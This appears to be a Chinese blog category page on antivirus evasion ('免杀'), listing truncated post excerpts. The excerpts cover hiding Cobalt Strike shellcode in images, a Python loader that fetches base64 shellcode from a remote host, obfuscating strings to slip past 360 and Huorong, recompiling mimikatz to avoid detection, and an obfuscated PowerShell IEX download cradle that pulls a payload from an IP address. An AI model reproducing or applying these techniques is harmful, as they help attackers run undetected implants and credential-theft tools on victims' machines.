随笔分类 - 免杀
摘要:地址 https://github.com/Hangingsword/HouQing 修改key 生成shellcode 将生成的shellcode放入code.go 写入图片 go run code.go 11.jpeg 将11.jpeg放入vps 执行命令 开启web服务 python -m S
阅读全文
摘要:1.使用cs生成bin文件 2.下载工具 https://github.com/9emin1/charlotte 安装mingw-w64* yum install mingw-w64* mac使用 brew install mingw-w64 3.修改payload.bin改名为beacon.bin
阅读全文
摘要:1. import ctypes import base64 import requests #shell需要先进行base64加密,再进行hex加密 code = requests.get("http://192.168.1.1/123.txt") shellcode = bytearray(ba
阅读全文
摘要:首先网上找一个加载器 pyinstaller -F -w 1.py 进行打包,使用火绒或者360检测 分步排查 每次增加几行代码,逐步找到特征值 找到特征码 分字符函数进行排查,确定字符RltMoveMemory为特征值 RtlMoveMemory作用为从指定内存中复制内存至另一内存里 此时进行混淆
阅读全文
摘要:第一步cs生成python版测shellcode 第二步 提取双引号内容,并进行base64编码,放入python04.TXT 第三步 shellcode加载器修改地址,并进行base64加密,放入pythonshellcode.txt。同时将pythonshellcode.txt和python04
阅读全文
摘要:1.找到csc.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 2.找到System.Management.Automation.dll C:\Windows\assembly\GAC_MSIL\System.Managemen
阅读全文
摘要:最终结果 windows10 echo set-alias -name hhh -value IEX;hhh(New-Object "NeT.WebC`li`ent")."Down`l`oadStr`ing"('ht'+'tP://10’+'1.34.38.1'+'89/a') | %psmodul
阅读全文
摘要:mimikatz源码 下载地址https://github.com/gentilkiwi/mimikatz/releases/tag/2.2.0-20210709 使用vs2019打开工程mimikatz.sln 这里右击解决方案'Mimikatz'-->属性-->配置属性-->这里只选中mimik
阅读全文
摘要:1.cs木马制作 将文件设置为txt保存 修改txt为123.ps1 使用invoke-Obsfuscation文件,进行免杀 Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation 选择ascii编码 1 back 选择自己需要的 这里
阅读全文
浙公网安备 33010602011771号